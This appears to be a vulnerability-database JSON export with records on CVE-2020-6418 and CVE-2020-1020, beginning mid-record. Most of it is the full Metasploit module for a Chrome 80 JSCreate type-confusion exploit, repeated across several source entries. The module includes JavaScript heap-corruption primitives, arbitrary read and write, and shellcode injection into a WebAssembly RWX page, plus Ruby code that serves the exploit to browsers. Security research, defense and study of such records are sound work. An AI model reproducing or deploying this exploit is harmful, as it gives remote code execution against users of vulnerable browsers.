}\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n jscript = add_debug_print_js(jscript)\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-04-29T06:47:00", "description": "# CVE_2020_6418_PoC\nfor \u4f9b\u990a\n\nSandbox escape exploit not included....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-13T07:32:24", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-04-29T02:54:21", "id": "D253294E-AE35-5B65-8B7D-17D007162D00", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:54:29", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T06:23:59", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-06-03T11:27:26", "id": "43EBEC21-E951-555D-B83D-6CE834F5BF3C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:36", "description": "# CVE-2020-1020\nWi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-10T03:10:39", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-04-24T16:54:15", "id": "6E95B9E1-979B-595D-A4F4-99125E6059E4", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2022-03-31T19:34:14", "description": "This Metasploit module exploits an issue in Google Chrome version 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34056", "href": "https://0day.today/exploit/description/34056", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => 'Feb 19 2020'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-05T22:51:46", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156632", "href": "https://packetstormsecurity.com/files/156632/Google-Chrome-80-JSCreate-Side-Effect-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit \ncorrupts the length of a float array (float_rel), which can then be used for out \nof bounds read and write on adjacent memory. \nThe relative read and write is then used to modify a UInt64Array (uint64_aarw) \nwhich is used for read and writing from absolute memory. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, \nwhich is then replaced with the payload shellcode. \nThe payload is executed within the sandboxed renderer process, so the browser \nmust be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Cl\u00e9ment Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # exploit \n'Vignesh S Rao', # exploit \n'timwr', # metasploit copypasta \n], \n'References' => [ \n['CVE', '2020-6418'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'], \n['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'], \n['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}], \n['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}], \n], \n'DisclosureDate' => 'Feb 19 2020')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nescaped_payload = Rex::Text.to_unescape(payload.raw) \njscript = %Q^ \nvar shellcode = unescape(\"#{escaped_payload}\"); \n \n// HELPER FUNCTIONS \nlet conversion_buffer = new ArrayBuffer(8); \nlet float_view = new Float64Array(conversion_buffer); \nlet int_view = new BigUint64Array(conversion_buffer); \nBigInt.prototype.hex = function() { \nreturn '0x' + this.toString(16); \n}; \nBigInt.prototype.i2f = function() { \nint_view[0] = this; \nreturn float_view[0]; \n} \nBigInt.prototype.smi2f = function() { \nint_view[0] = this << 32n; \nreturn float_view[0]; \n} \nNumber.prototype.f2i = function() { \nfloat_view[0] = this; \nreturn int_view[0]; \n} \nNumber.prototype.f2smi = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.fhw = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.flw = function() { \nfloat_view[0] = this; \nreturn int_view[0] & BigInt(2**32-1); \n} \n \nNumber.prototype.i2f = function() { \nreturn BigInt(this).i2f(); \n} \nNumber.prototype.smi2f = function() { \nreturn BigInt(this).smi2f(); \n} \n \nfunction hex(a) { \nreturn a.toString(16); \n} \n \n// \n// EXPLOIT \n// \n \n// the number of holes here determines the OOB write offset \nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1]; \nvar float_rel; // float array, initially corruption target \nvar float_carw; // float array, used for reads/writes within the compressed heap \nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space \nvar obj_leaker; // used to implement addrof \nvuln.pop(); \nvuln.pop(); \nvuln.pop(); \n \nfunction empty() {} \n \nfunction f(nt) { \n// The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug \nvuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05); \nfor (var i = 0; i < 0x10000; ++i) {}; \n} \n \nlet p = new Proxy(Object, { \nget: function() { \nvuln[0] = {}; 